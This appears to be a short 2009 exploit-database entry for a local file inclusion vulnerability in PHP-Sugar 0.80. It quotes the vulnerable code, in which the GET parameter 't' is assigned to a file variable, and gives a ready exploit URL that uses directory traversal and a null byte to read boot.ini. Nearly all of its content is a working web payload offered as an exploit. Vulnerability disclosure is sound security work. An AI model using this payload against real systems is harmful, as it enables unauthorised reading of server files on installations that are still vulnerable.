[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : PHP-Sugar 0.80 (index.php t) Local File Inclusion Vulnerability
# Published : 2009-06-29
# Author : ahmadbady
# Previous Title : Almnzm (COOKIE: customer) Remote SQL Injection Vulnerability
# Next Title : Clicknet CMS 2.1 (side) Arbitrary File Disclosure Vulnlerability
=-=-local file include-=-=
-=-=-=-=-=-=-=-=-=-=-=-
script: PHP-Sugar 0.80
-----------------------
Author: ahmadbady
my site :Coming Soon
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
download from:http://php-sugar.net/files/?mod=files
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
if (isset($_GET['t']))
$file = $_GET['t'];
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
xpl:
/path/test/index.php?t=..//..//..//..//..//boot.ini%00
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-
# www.Syue.com [2009-06-29]